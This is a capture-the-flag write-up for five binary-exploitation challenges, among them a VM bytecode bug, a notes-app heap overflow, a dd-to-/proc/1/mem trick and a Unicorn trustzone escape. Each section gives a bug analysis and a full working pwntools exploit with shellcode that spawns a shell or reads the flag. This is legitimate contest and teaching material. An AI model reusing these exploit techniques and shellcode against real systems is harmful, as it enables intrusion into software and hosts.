alt text

Write-ups for 5 challenges I solved.

All scripts and IDA databases are stored in the attachment file. I don’t describe how I reversed the challenge binary files, you could check the IDA database if you want to know what did I do to reverse the binary files.

multiarch-2

Analyze

First, I analyzed two functions mapSegment(0x1319) and panic (0x2A1E) to figure out the structor of VM:

struct __attribute__((packed)) BufIO
{
  char *data;
  uint offset;
};


struct __attribute__((packed)) __attribute__((aligned(1))) VM
{
  void *page1;
  void *page2;
  void *pagedummy;
  char *page3;
  size_t size3;
  char *(*func)(void);
  char check[3];
  int rip;
  int stack;
  uint regs[4];
  BufIO bufs[5];
  uint bufcount;
};


VM *__fastcall mapSegment(SegmentList *SegmentList)
{
  VM *vm; // rbx
  void *page1_; // r14
  void *page2_; // r13
  void *page3_; // r12
  size_t size; // r13

  vm = (VM *)calloc(1uLL, 0x88uLL);
  page1_ = mmap(0LL, 0x1000uLL, 7, 33, 0, 0LL);
  vm->page1 = page1_;
  page2_ = mmap(0LL, 0x1000uLL, 7, 33, 0, 0LL);
  vm->page2 = page2_;
  vm->pagedummy = mmap(0LL, 0x1000uLL, 7, 33, 0, 0LL);
  page3_ = calloc(1uLL, SegmentList->chunk3.size);
  vm->page3 = page3_;
  vm->func = getFlag;
  memcpy(page1_, SegmentList->chunk1.data, SegmentList->chunk1.size);
  memcpy(page2_, SegmentList->chunk2.data, SegmentList->chunk2.size);
  size = SegmentList->chunk3.size;
  memcpy(page3_, SegmentList->chunk3.data, SegmentList->chunk3.size);
  vm->size3 = size;
  vm->rip = 4096;
  vm->stack = 0x8F00;
  return vm;
}

void __fastcall __noreturn panic(VM *vm, char a2)
{
  int i; // ebp
  unsigned int current_stack; // r12d
  const char *__; // rsi
  int dest; // [rsp+Ch] [rbp-44h] BYREF
  unsigned __int64 v6; // [rsp+10h] [rbp-40h]

  v6 = __readfsqword(0x28u);
  printf(
    "  ---[ PC=0x%08x SP=0x%08x | A=0x%08x B=0x%08x C=0x%08x D=0x%08x\n",
    vm->rip,
    vm->stack,
    vm->regs[0],
    vm->regs[1],
    vm->regs[2],
    vm->regs[3]);
  if ( a2 )
  {
    puts("  ---[ STACK CONTENTS");
    for ( i = -8; i != 20; i += 4 )
    {
      current_stack = vm->stack + i;
      if ( !read_4(vm, current_stack, &dest) )
        break;
      __ = "  ";
      if ( vm->stack == current_stack )
        __ = "* ";
      printf("\t%s0x%08x  0x%08x\n", __, current_stack, dest);
    }
  }
}

Basically, the VM struct has one PC register, one stack register and 4 general purpose registers.
It has three pages ( page1, page2 and page_dummy) which used to store the bytecodes, page3 is used to store the data.

func is the function pointer which would be called in getFlag:

char *getFlag()
{
  char *v0; // rbx

  v0 = getenv("FLAG");
  if ( !v0 )
    fwrite("[E] no $FLAG set! do you need to hack harder?\n", 1uLL, 0x2EuLL, stderr);
  return v0;
}

When I saw this function, I knew my job is overwritting this function pointer.

For the more details how these 4 pages work, let review getDesc and allocNewSegment.
In the getDesc function, it would return:

page1 + offset - 0x1000 if the offset is in range [0x1000, 0x20000) ( This is why the initialize value of pc is 0x1000)
page2 + offset - 0x2000 if the offset is in range [0x2000, 0x3000)
pagedummy + offset - 0x3000 if the offset is in range [0x8000, 0x9000)
Otherwise, it would return bufs.data[offset-object_offset]

To figure out where these bufs objects come from, check allocNewSegment:

bool __fastcall allocNewSegment(VM *vm, int offset, unsigned int *ret)
{
  unsigned __int8 n5; // r12
  bool result; // al
  unsigned int final_offset; // ebx
  char *data; // rax
  __int64 n5_1; // rdx

  n5 = vm->bufcount;
  result = 0;
  if ( n5 != 5 )
  {
    final_offset = offset & 0xFFFFF000;
    if ( (offset & 0xFFFFF000) == 0 )
      final_offset = 40960;
    while ( getDest(vm, final_offset, 1LL) )
      final_offset += 0x1000;
    LOBYTE(vm->bufcount) = n5 + 1;
    data = (char *)calloc(0x200uLL, 1uLL);
    n5_1 = n5;
    vm->bufs[n5_1].data = data;
    vm->bufs[n5_1].offset = final_offset;
    *ret = final_offset;
    return 1;
  }
  return result;
}

For the first time it is called:

if offset < 0x1000, it would try to allocate a BufIO object which represents for the VM’s data at the offset [0xa000, 0xa000+0x200), [0xa000+0x200*n, 0xa000+0x200*(n+1) ) for next times.
if offset >= 0x3000, it would try to allocate a BufIO object which represents for the VM’s data at the offset [0x3000, 0x3000+0x200), [0x3000+0x200*n, 0x3000+0x200*(n+1) ) for next times.

That why getDesc whould return bufs.data[bufs.offset - offset] if the offset >= 0x3000.

Check some “interesting” syscall and find the bug

In exec_regVM function, there are two syscalls used for read/write buffer which should be useful for the future exploitation.

{
  switch ( op )
  {
    case 0u:
      return 0;
    case 1u:
      LOBYTE(Int_1) = check_sys_num(vm);
      Int = Int_1;
      if ( (_BYTE)Int_1 )
      {
        switch ( vm->regs[0] )
        {
          case 0u:
            Int = getInt(vm, &y);
            if ( (_BYTE)Int )
              vm->regs[0] = y;
            else
              vm->check[0] = 1;
            break;
          case 1u:
            Int = readBuf(vm, vm->regs[1], vm->regs[2]);
            if ( !(_BYTE)Int )
              vm->check[0] = 1;
            break;
          case 2u:
            Int = printBuf(vm, vm->regs[1], vm->regs[2]);
            if ( !(_BYTE)Int )
              vm->check[0] = 1;
            break

I could call syscall 0 to change regs[0] and call any sycalls I want, but I had to find the way to control regs[1] and regs[2]

This thought let me to check the opcode 0x21 of regVM. In this case, I could add the value of one reg with any value:

case 0x21u:
  v16 = vm->rip;
  vm->rip = v16 + 1;
  if ( (unsigned __int8)read_1(vm, v16, &n)
    && (LOBYTE(Int_3) = read_4(vm, (unsigned int)vm->rip, &y), Int = Int_3, (_BYTE)Int_3) )
  {
    vm->rip += 4;
    vm->regs[(n >> 4) - 1] += y;
  }

And … so I found something interesting. Since I could control the value of n, there is no check to make sure whether n is in the bound of regs or not, that means I could also change the value of bufs!

Up to now, everything was clear. I just need to call allocNewSegment to allocate a BufIO object and change its data to an address that is useful to leak memory.

Xrefs the allocNewSegment, I could use syscall 6 of stackVM to call the function with any arguments I want:

if ( op.op == (char)0xA0 )
{
  if ( check_sys_num(vm) )
  {
    if ( (unsigned __int8)read_1_stack(vm, &dest) )
    {
      switch ( dest )
      {
        ...
        case 6:
          if ( (unsigned __int8)read_4_stack(vm, &inp)
            && allocNewSegment(vm, inp, &ret)
            && (unsigned __int8)pushInt(vm, ret) )
          {
            goto LABEL_22;
          }
        ...
      }
    }
  }
}
...

Calculating the offset between vm object and the first BufIO::data, we could change the data to vm->page2 and leak page2‘s address.

After that, just change the data to vm->func and change func point to page2 (which we could setup our shellcode on there).

alt text

Since the program use bittest to determine it should use regVM or stackVM. I asked chatGPT for helping crap right payload :).

Final script

#!/usr/bin/env python
from pwn import *
from time import sleep
from os import popen

context.binary = e = ELF("debug")
libc = e.libc
gs = """
ida_connect
"""


def start():
    if args.LOCAL:
        p = e.process(["inp.masm"])
    elif args.GDB:
        p = gdb.debug([e.path, "inp.masm"], gdbscript=gs)
    elif args.REMOTE:  # python x.py REMOTE <host> <port>
        host_port = sys.argv[1:]
        p = remote(host_port[0], int(host_port[1]))
        p.recvuntil(b'You can run the solver with:\n')
        cmd = p.recvline().decode()
        log.info(cmd)
        ans = popen(f"bash -c '{cmd}'").read()
        p.sendlineafter(b'Solution? ', ans.encode())
        data = open("inp.masm", "rb").read()
        p.sendlineafter(b"How big is your program? ", str(len(data)).encode())
        p.send(
            data
        )
    return p


rip = 4096


def set_page3_bit(page3, rip, should_be_set):
    # Apply same logic as in C:
    v2 = rip - 4089
    if rip >= 4096:
        v2 = rip - 4096
    index = v2 >> 3
    bit = rip & 7
    if not (0 <= index < len(page3)):
        print(f"Warning: v2 >> 3 = {index} out of bounds")
        return
    if should_be_set:
        page3[index] |= (1 << bit)
    else:
        page3[index] &= ~(1 << bit)


f = open("inp.masm", "wb")
f.write(b"MASM")


instructions = [
    [0, p8(0x10)+p32(6)],  # push 6
    [0, p8(0xa0)+p32(0)],  # call allocNewSegment(0)
    [1, p8(0x21)+p8(5 << 4)+p32(0xffffef88)], # Change data -> page2
    [1, p8(0x21)+p8(1 << 4)+p32(2)], # syscall 2
    [1, p8(0x21)+p8(2 << 4)+p32(0xa000)],
    [1, p8(0x21)+p8(3 << 4)+p32(0x8)],
    [1, p8(1)], # print
    [1, p8(0x21)+p8(5 << 4)+p32(0xffffffd8)],
    [1, p8(1)],
    [1, p8(0x21)+p8(5 << 4)+p32(0x28)],
    [1, p8(0x21)+p8(1 << 4)+p32(0xffffffff)], # syscall 1
    [1, p8(1)], # write
    [0, p8(0x10)+p32(5)], # call getFlag
    [0, p8(0xa0)+p32(0)],
]

segAdata = b''
segBdata = asm(shellcraft.cat("/flag"))
segCdata = bytearray(0x1000)

for ins in instructions:
    segAdata += ins[1]


for expected, instr in instructions:
    set_page3_bit(segCdata, rip, expected)
    rip += len(instr)


segA = p8(1)+p16(19)+p16(len(segAdata))
segB = p8(2)+p16(19+len(segAdata))+p16(len(segBdata))
segC = p8(3)+p16(19+len(segAdata)+len(segBdata))+p16(len(segCdata))

f.write(segA+segB+segC+segAdata+segBdata+segCdata)

f.close()

p = start()

p.recvuntil(b'[I] executing program\n')
e.address = u64(p.recv(8)) - e.sym.getFlag
log.success(hex(e.address))

# p.sendline(p64(e.plt.puts))
segA_addr = u64(p.recv(8))

p.sendline(p64(segA_addr-0x1000))


p.interactive()

the-classic-notes-app

Bug

write_note doesn’t check if offset is larger the note‘s size or not:

void write_note(int index, int offset, const char *buffer, int size)
{
    if (index < 0 || index >= note_size)
    {
        printf("Index out of range\n");
        return;
    }
    if (notes[index] == NULL)
    {
        printf("Create note first\n");
        return;
    }
    if (offset < 0)
    {
        printf("Offset cannot be less than 0\n");
        return;
    }
    memcpy(notes[index] + offset, buffer, size); // bug
}

Exploit

To make it easy to debug, I do not set GLIBC_TUNABLES='glibc.mem.tagging=1'.

alt text

Just write to notes[0] at offset 0x60, we actually change the value of notes[0].
Write \xb8\x02 to make notes[0] point to flag function pointer.
After that, read notes[0] to leak the flag function address.
Write notes[0] at offset 0x18 to change the exit function pointer, we would want it become flag.
Try to change notes[0] to unvaild address -> read note -> segfault -> call flag

This seems quite easy, but what if set GLIBC_TUNABLES='glibc.mem.tagging=1':
alt text

The offset is random now, but just only for the highest byte.

So I just need to bruteforce offset, P=1/256:

#!/usr/bin/env python
from pwn import *
from time import sleep

context.binary = e = ELF("ctf")

gs = """
target remote:1234
"""


def start():
    argvs = ["./qemu-aarch64", "-L", "./aarch64-linux-gnu/"]
    if args.LOCAL:
        argvs.append(e.path)
        p = process(argvs)
    elif args.GDB:
        argvs.append("-g")
        argvs.append("1234")
        argvs.append(e.path)
        p = process(argvs)
        # gdb.attach(None, gdbscript=gs)
        # pause()
    elif args.REMOTE:  # python x.py REMOTE <host> <port>
        host_port = sys.argv[1:]
        p = remote(host_port[0], int(host_port[1]))
    return p


def create_note(size: int):
    p.sendlineafter(b'Give me your command:\n', b"C"+str(size).encode())


def read_note(idx: int):
    p.sendlineafter(b'Give me your command:\n',
                    b'R'+str(idx).encode())


def write_note(idx: int, offset: int, size: int, data: bytes):
    p.sendlineafter(b'Give me your command:\n',
                    b'W' + f"{idx} {offset} {size}".encode()+data)


for i in range(256+10):
    try:
        p = start()
        # create_note(0x30)
        in0 = p16(0x2a8)
        write_note(0, 0x000000000000060, len(in0), in0)
        read_note(0)
        p.recvuntil(b'Note at 0: ')
        in1 = p.recv(6)

    except EOFError:
        p.close()
        continue
    else:
        log.info(hex(u64(in1+b'\0'*2)))
        write_note(0, 0x10, len(in1), in1)
        write_note(0, 0xf0-8, 8, b'A'*8)
        read_note(0)
        break

p.interactive()

pwn-datadefinition

Analyze

import subprocess
import sys


def main():
    print('Do you like dd? It is my favorite old-style tool :D\n')
    line = input('  > What is your favorite dd line?: ').encode()
    user_input = input('  > Any input to go with it?: ').encode()
    print('I like it! Let\'s give it a go!')
    res = subprocess.run(['dd'] + line.split(), input=user_input,
                         capture_output=True)
    print(res.stdout.decode('utf-8'))
    print(res.stderr.decode('utf-8'))
    print('It was fun, bye!')


if __name__ == '__main__':
    main()

With dd, we can read/write any files, any where we want.
But the flag file has a random name.

alt text

Somehow, the python file on the container is a static binary.

The author did not write about this on the challenge’s discription. From now, I could say it is a guessy challenge.

Since the addresses is not changed, we could use /proc/.../mem trick.

In the config files, I could guess the pid of python process should be 1:

mode: ONCE
uidmap {inside_id: "0"}
gidmap {inside_id: "0"}
keep_caps: true
...

cwd: "/home/user"

mount: [
 ....
  {
    dst: "/proc"
    fstype: "proc"
    rw: true
  }
  ...
]

CMD kctf_setup && \
    kctf_drop_privs \
    socat \
      TCP-LISTEN:1337,reuseaddr,fork \
      EXEC:"kctf_pow nsjail --config /home/user/nsjail.cfg -- /usr/bin/python3 -u /home/user/chall.py"

Since keep_caps is true, we should be able to write on /proc/1/mem.

alt text

Now, I have to write what and where?

Since line and user_input use default encoding of Python which is utf-8, I could not write any bytes I want, the byte should not be greater than 0x7f.

I found that when pymain_main is going to return, rdi=0, rsi=rsp-0x208, and rdx is big enough. So I just wrote syscall ; ret at the end of the function.
alt text

I could say that I was luckly to see this way to deal with this guessy challenge.

Final script

#!/usr/bin/env python
from pwn import *
from time import sleep
from os import popen

context.arch = 'amd64'
shellcode = asm("""
syscall
ret
""")
escaped = ''.join(f'\\x{b:02x}' for b in shellcode)

host_port = sys.argv[1:]
p = remote(host_port[0], int(host_port[1]))

if host_port[0] != "localhost":
    p.recvuntil(b'You can run the solver with:\n')
    cmd = p.recvline().decode()
    log.info(cmd)
    ans = popen(f"bash -c '{cmd}'").read()
    p.sendlineafter(b'Solution? ', ans.encode())

pause()

p.sendlineafter(b'  > What is your favorite dd line?: ',
                b'if=/proc/self/fd/0 of=/proc/1/mem bs=1 seek='+str(0x6BC71E).encode())
p.sendlineafter(b'Any input to go with it?:',
                shellcode.decode('latin-1').encode())

pause()

p.send(
    b'\0'*0x208 +
    p64(0x00000000004f8dbd) + p64(0x75e1c1) + p64(0x00000000004f8dbd+1) +
    p64(0x4206c0)
)

p.interactive()

pwn-playbook

Bug

There is only one bug and it is in new_playbook function:

Since nesting_depth is a global variable, there is always a chance that p_idx can be decreased even it is still pointing to idx[0]:

int idx[11]; // [rsp+1004h] [rbp-4Ch] BYREF
  int *p_idx; // [rsp+1030h] [rbp-20h] MAPDST
  int nest; // [rsp+1038h] [rbp-18h]

  p_idx = idx;
  nest = 1;
  len = 251;
  puts("Enter new playbook in the SOPS language. Empty line finishes the entry.");
  idx[0] = allocate_playbook();
  while ( fgets(inpbuf, len, stdin) && inpbuf[0] != 10 )
  {
    memset(buf, 0, sizeof(buf));
    _isoc99_sscanf(inpbuf, "%s", buf);
    ...
    {
      if ( !strcmp(buf, "ENDSTEP") )
      {
        --p_idx;
        if ( --nesting_depth < 0 )
        {
          puts("Mismatched STEP and ENDSTEP.");
          exit(1);
        }
      }

We can decrease p_idx twice before running STEP, when p_idx is increased again, it will point to len, that means len would be equal to the return value of allocate_playbook:

if ( !strcmp(buf, "STEP") )
    {
      ++p_idx;
      if ( ++nesting_depth > 9 )
      {
        puts("Max nesting depth reached.");
        exit(1);
      }
      *p_idx = allocate_playbook();
      add_child(*(p_idx - 1), *p_idx);
      nest = 1;
    }

I need len should be greater than 512 so I could overwrite the next playbook via strcpy:
1
strcpy_ifunc(steps[*p_idx].data, buf);

this could be achived by create more than 512 playbooks before.

Exploit

Just need to change the type of the next playbook to CMD, it would run any commands in note‘s data.

#!/usr/bin/env python
from pwn import *
from os import popen
from time import sleep

context.binary = e = ELF("chal")

gs = """
set follow-fork-mode parent
# b *0x4021C5
# b *0x402605
# b new_playbook
# b *0x401E69
b *0x4025B7
"""


def start():
    if args.LOCAL:
        p = e.process()

    elif args.REMOTE:  # python x.py REMOTE <host> <port>
        host_port = sys.argv[1:]
        p = remote(host_port[0], int(host_port[1]))
        p.recvuntil(b'You can run the solver with:\n')
        cmd = p.recvline().decode()
        log.info(cmd)
        ans = popen(f"bash -c '{cmd}'").read()
        p.sendlineafter(b'Solution? ', ans.encode())
    return p


def add(list_data: list[bytes]):
    p.sendline(b"2")
    p.recvuntil(
        b'Enter new playbook in the SOPS language. Empty line finishes the entry.\n')
    for data in list_data:
        # if len(data) == 251 or b'\n' in data:
        #     p.send(data)
        # else:
        p.sendline(data)


def remove(idx):
    p.sendlineafter(b"5. Quit\n", b"3")
    p.sendlineafter(b"Enter playbook id:\n", str(idx).encode())


def execute(idx):
    p.sendlineafter(b"5. Quit\n", b"4")
    p.sendlineafter(b"Enter playbook id:\n", str(idx).encode())


p = start()

# for i in range(1, 0x50):
#     add([b"note: " + b'A' * 0x30, b'STEP',
#          b"note: " + b'B' * 0x30, b'ENDSTEP', b'\n'])
#     remove(i + 1)

# add([b"note: " + b'A' * 0x30, b'\n'])
# execute(1)
# for i in range(0x4f):
#     p.recvuntil(b'Note: ')
#     if i == 0xa:
#         p.sendline(p8(i))
#     else:
#         p.send(p8(i)*251)

# sleep(1)

for i in range(1, 512+30):
    if i < 3:
        add([b"note: " + b'A' * 0x30, b'STEP', b'\n'])
    else:
        add([b"note: " + b'sh', b'\n'])
    log.info(str(i))


if args.GDB:
    gdb.attach(p, gdbscript=gs)
    pause()

# p.sendline(b'#'*249)
# p.sendline(b"2")
# p.recvuntil(
#     b'Enter new playbook in the SOPS language. Empty line finishes the entry.\n')
# p.send(b'note: ')
# for i in range(250-7):
#     p.send(b' ')

# pause()

# p.proc.stdin.close()
remove(512+20)
remove(512+21)

add([b'ENDSTEP', b'ENDSTEP', b'STEP', b'note: '+b'1'*(512)+p8(1 | 2), b'\n'])

execute(512+22)

p.sendline(b'\ncat /flag ; cat /flag.txt ; cat flag.txt ; cat flag')

p.interactive()

pwn-unicornel-trustzone

Analyze

The docutment only describes how three trustzones work, not their source codes:

There are currently three example trustzones you can load:

  Name: create_map_shared_x86_64
  Calling Convention: rax = trustzone_invoke syscall #, rbx = addr, rcx = length
  Return Value: rbx = shared memory handle, or error code from create_shared if a buffer could not be created
  Description: This trustzone will create and map a shared memory buffer of the desired length into the current 
  process at the specified address.

  Name: map_shared_x86_64
  Calling Convention: rax = trustzone_invoke syscall #, rbx = shared memory handle, rcx = addr, rdx = length
  Return Value: rbx = 0xffff on validate_handle failure, or the return value from the map_address syscall
  Description: This trustzone maps a shared memory buffer specified by the handle into the current process at 
  the specified address.

  Name: memprot_x86_64
  Calling Convention: rax = trustzone_invoke syscall #, rbx = addr, rcx = length, rdx = prot, rdi = password
  Return Value: rbx = 0xffff on password authentication failure, or the return value from the memprot syscall
  Description: This trustzone sets the memory protection on a range of memory. Please note that rdi must be a 
  pointer to a string containing the password.

So I created map_shared_x86_64 and memprot_x86_64 based on what the document says ( I didn’t need create_map_shared_x86_64 since create_shared is not trusted syscall):

from pwn import *

context.arch = 'amd64'

open("map_shared_x86_64", "wb").write(asm("""
mov r10, rcx
mov rcx, rdx
mov rax, 4
int 3
//validate_handle rax = address
mov rbx, rax
mov rcx, r10                                          
xchg rcx, rdx
xchg rdx, rbx
mov rax, 5                        
int 3
// map_address
mov rbx,rax                                                                                    
"""))
open("memprot_x86_64", "wb").write(asm("""
  mov rax, 11                                       
  mov r10, rbx
  mov r11, rdx                                       
  mov rbx, rdi
  //confirm password
  int3
  cmp eax,0
  je continue
  mov ebx, 0xffff
  jmp done                                                                              
continue:
  mov rbx, r10
  mov rdx, r11                                       
  mov rax, 12
  int3                                        
done:
  nop
"""))

As the document says, we need password authentication to be success to use memprot_x86_64

Why I needed memprot_x86_64? Because it could change the perm of any addresses, including trustzone:

long memprot(struct process* current) {
    TRUSTED_SYSCALL;
    unsigned long addr = ARG_REGR(current,1);
    unsigned long length = ARG_REGR(current,2);
    unsigned long prot = ARG_REGR(current,3);
    return uc_mem_protect(current->uc,addr,length,prot);
}

Since only trustzone’s bytecodes can call trusted syscalls, being able to write these bytecodes is promising for the furture exploitation.

Leak password

Reading the source codes of confirm_password, I could be sure that password file should be in the same directory with the chal file:

1	int password_fd = open("password",O_RDONLY);

I could take advantage of the create_trustzone to read the password and map to any address since the function can open any files in the same directory:

for(unsigned i = 0; i < sizeof(filename); i++) {
        if(filename[i] == '.' || filename[i] == '/') {
            filename[i] = '_';
        }
    }
int fd = open(filename,O_RDONLY);

But the safe_read checks if the address is overlap with trustedzone or not, so it was not easy to read the password:

bool overlaps_tz(struct process* current,long src, unsigned n) {
    return current->trusted_zone_hook && !(src + n <= current->trustzone || current->trustzone + PAGE_ALIGN(current->tz_size) <= src);
}

uc_err safe_read(struct process* current, char* dst, long src, size_t n) {
    if(overlaps_tz(current,src,n)) TRUSTED_SYSCALL;
    return uc_mem_read(current->uc,src,dst,n);
}

First, I had thought to make the size be so big that src + n could cause integer overflow (which means src + n < src).

This is ridiculous because no process can handle big size like that.

But I re-thought again, what if the value of address could be so big?

alt text

Turned out, unicorn doesn’t care if the address is in user-space or kernel-space. After all, it is just an emulator.

Since src = trustzone = 0xfffffffffffff000, and size = 0x1000; I could bypass overlaps_tz now.

alt text

Shellcode:

mov rax, 8
mov rbx, 0xfffffffffffff000
lea rcx, [rip+password]
int3
       
mov rax,1
mov rbx, 0xfffffffffffff000
mov rcx, 0x1000
int3     

password:
    .asciz "password"

Leak emulator address

With the leaked password, I could use memprot_x86_64 to enable write perm to trustzone.

The validate_handle function returns shared_buffers’s address:

long validate_handle(struct process* current) {
    TRUSTED_SYSCALL;
  ...
    return (long) shared_buffers[handle].buffer;
}

so I could write the shellcode calls this function and print the return value to leak address:

mov eax, 4
xor ebx, ebx
mov ecx, 0x1000
int3
mov rbx, rax
mov eax,2
int3

I chose to allocate a buffer has the size of 0xf000. This buffer should be fixed with TLS address, which I could take advantage of it to leak other segments’ addresses:

mov rsp, 0x13380800
                
mov rax, 3
mov rbx, 0xf000 
int3
// calloc 0xf000

mov rax, 8
mov rbx, 0x42420000
lea rcx, [rip+memprot_x86_64]
int3

mov rax, 10
mov rbx, 0x42420000
mov rcx, 0x1000
mov rdx, 7
lea rdi, [rip+password_buffer] 
int3

mov rbx, rax     
mov rax, 2
int3

mov rdi, 0x42420000
lea rsi, [rip+evil]
mov edx, 0x20
call memcpy

mov eax,10
int3

jmp $
map_shared_x86_64:
    .asciz "map_shared_x86_64"
memprot_x86_64:
    .asciz "memprot_x86_64"
password_buffer:
    .asciz "sup3r_s3cure_sj\0"
password:
    .asciz "password"
newline:
    .asciz "\n"
nop

memcpy:
    test    rdx, rdx         
    jz      memcpy_done
memcpy_loop:
    mov     al, [rsi]  
    mov     [rdi], al
    inc     rsi
    inc     rdi
    dec     rdx 
    jnz     memcpy_loop
memcpy_done:
    ret

evil:
mov eax, 4
xor ebx, ebx
mov ecx, 0x1000
int3
mov rbx, rax
mov eax,2
int3

Although it was not fixed with TLS as I expected, but I could leak the heap’s address and a JIT (RWX) address:
alt text

After having the leaked addresses, I created a new process which overwrote its trustzone to:

1 2	mov eax, 5 int3

This shellcode could let me call map_address directly, to read/write any host’s addresses I want.

Write the shellcode on where?

Up to this point, I leaked heap address, a RWX address.

First time, I had tried to overwrite the opcode of thread 2 to the shellcode spawns shell:
alt text

But the leaked RWX address is not fixed with the RIP of the second thread on the remote.

So I tried to leak the stack address of the second thread.

Because of the same shellcode and the same execution, I think call-stack of the remote process and the local one should be the same. Overwritting the second thread’s return address might be a good way.

I found that the second thread’s stack address could be leak via a pointer at heap+0x5b00.

alt text

After overwritting its return address, the final work to do is making it return.

alt text

I saw it check if the local variable ($rbp-0x10) is negative or not.

Up to this point, the variable is always equal to 0 so the thread would never stop the loop ( I think because the end of my first shellcode is jmp $).

Changing the variable to -1 ( As you could see, it was in the heap segment and I had leaked the heap address before).

The second thread would return and execute our shellcode.

alt text

Final script

This is so f*cking long. I suggest you should debug yourself first.

#!/usr/bin/env python
from pwn import *
from time import sleep
from os import popen

context.binary = e = ELF("chal")

gs = """
"""
def start():
    if args.LOCAL:
        p = e.process(stderr=open("/dev/null", "w"))
        
    elif args.REMOTE:  # python x.py REMOTE <host> <port>
        host_port = sys.argv[1:]
        p = remote(host_port[0], int(host_port[1]))
        p.recvuntil(b'You can run the solver with:\n')
        cmd = p.recvline().decode()
        log.info(cmd)
        ans = popen(f"bash -c '{cmd}'").read()
        p.sendlineafter(b'Solution? ', ans.encode())
    return p

code1 = asm(open("shellcode1.asm", "r").read())+b'\x90'*0x40
data1 = p32(4)  # UC_ARCH_X86
data1 += p32(1 << 3)  # UC_MODE_64
data1 += (
    p64(0x13370000) + p64(0x1000) +
    p64(0x13380000) + p64(0x1000) +
    p64(0x13390000) + p64(0x1000) +
    p64(0x133a0000) + p64(0x2000)
)
data1 += p16(len(code1))
data1 += p8(3)
data1 = data1.ljust(0x50, b'\0')

p = start()

p.send(data1)
p.sendafter(b"CODE_START\n", code1)
p.recvuntil(b'new process created with pid 0\n')
p.recvuntil(b'0\n')
buf0 = int(p.recvline().decode())
log.info(hex(buf0))

code2 = asm(open("shellcode2.asm", "r").read().replace("leaked_address", str(buf0+0xf000))) + b'\x90'*0x20 + asm(shellcraft.sh())

data2 = p32(4)  # UC_ARCH_X86
data2 += p32(1 << 3)  # UC_MODE_64
data2 += (
    p64(0x13470000) + p64(0x1000) +
    p64(0x13380000) + p64(0x1000) +
    p64(0x13390000) + p64(0x1000) +
    p64(0x133a0000) + p64(0x2000)
)
data2 += p16(len(code2))
data2 += p8(3)
data2 = data2.ljust(0x50, b'\0')

if args.GDB:
    gdb.attach(p, gdbscript=gs)
    pause()

p.send(data2)
p.sendafter(b"CODE_START\n", code2)
p.interactive()

shellcode1:

mov rsp, 0x13380800
mov r10, 0x13390000
                
mov rax, 3
mov rbx, 0xf000 
int3
// calloc 0xf000


mov rax, 8
mov rbx, 0x42420000
lea rcx, [rip+memprot_x86_64]
int3

mov rax, 10
mov rbx, 0x42420000
mov rcx, 0x1000
mov rdx, 7
lea rdi, [rip+password_buffer] 
int3

mov rbx, rax     
mov rax, 2
int3

mov rdi, 0x42420000
lea rsi, [rip+evil]
mov edx, 0x20
call memcpy

mov eax,10
int3

jmp $

map_shared_x86_64:
    .asciz "map_shared_x86_64"
memprot_x86_64:
    .asciz "memprot_x86_64"

password_buffer:
    .asciz "sup3r_s3cure_sj\0"
password:
    .asciz "password"
newline:
    .asciz "\n"
nop

memcpy:
    test    rdx, rdx         
    jz      memcpy_done
memcpy_loop:
    mov     al, [rsi]  
    mov     [rdi], al
    inc     rsi
    inc     rdi
    dec     rdx 
    jnz     memcpy_loop
memcpy_done:
    ret

evil:
mov eax, 4
xor ebx, ebx
mov ecx, 0x1000
int3
mov rbx, rax
mov eax,2
int3

shellcode2:

mov rax, 8
mov rbx, 0x42420000
lea rcx, [rip+memprot_x86_64]
int3

mov rax, 10
mov rbx, 0x42420000
mov rcx, 0x1000
mov rdx, 7
lea rdi, [rip+password_buffer] 
int3

mov rbx, rax     
mov rax, 2
int3
            
mov rdi, 0x42420000
mov edx, 1
mov ecx, 0x10                        
l:
    mov rax, 0x9090909090909090
    mov qword ptr [rdi+8*rdx], rax
    inc edx
    loop l                    
        
lea rsi, [rip+evil]
mov edx, 6
mov rsp, 0x13380f00            
call memcpy

mov eax,10
mov rbx, 0xdead000
mov rcx, 0x10000
mov rdx, leaked_address          
int3

mov r10, 0xdead000
mov r8, qword ptr [r10+0x10]
lea r9, [r8-0x1a0]

mov rbx, r9
mov eax,2
int3

mov r11, qword ptr [r10+0x60]
sub r11, 0x41f0
mov rbx, r11
mov eax,2
int3
//heap


mov eax,10
mov rbx,0xdeadbeef000
mov rcx, 0xf000
mov rdx, r9
int3

mov rdi, 0xdeadbeef000
lea rsi, [rip+final]
mov rdx, 0x80
call qmemcpy

push r11
mov eax,10
mov rbx,0xdeaddead000
mov rcx, 0xb0000
mov rdx, r11
int3
pop r11

mov r11,0xdeaddead000
mov r12, qword ptr [r11+0x5b00]
sub r12,0x1630

mov rbx, r12
mov eax,2
int3


mov eax,10
mov rbx, 0x12345000
mov rcx, 0xf000
mov rdx, r12
int3


mov rbx, r9
mov eax,2
int3

mov r12, 0x12345000
mov qword ptr [r12+0xd38], r9
mov qword ptr [r11+0x3fc90], -1
jmp $

memprot_x86_64:
    .asciz "memprot_x86_64"
password_buffer:
    .asciz "sup3r_s3cure_sj\\0"
password:
    .asciz "password"

memcpy:
    test    rdx, rdx         
    jz      memcpy_done
memcpy_loop:
    mov     al, [rsi]  
    mov     [rdi], al
    inc     rsi
    inc     rdi
    dec     rdx 
    jnz     memcpy_loop
memcpy_done:
    ret

qmemcpy:
    test    rdx, rdx         
    jz      memcpy_done
qmemcpy_loop:
    mov     rax, [rsi]  
    mov     [rdi], rax
    add     rsi,8
    add     rdi,8
    sub     rdx,8 
    jnz     memcpy_loop
qmemcpy_done:
    ret
        
evil:
mov eax, 5
int3 

final: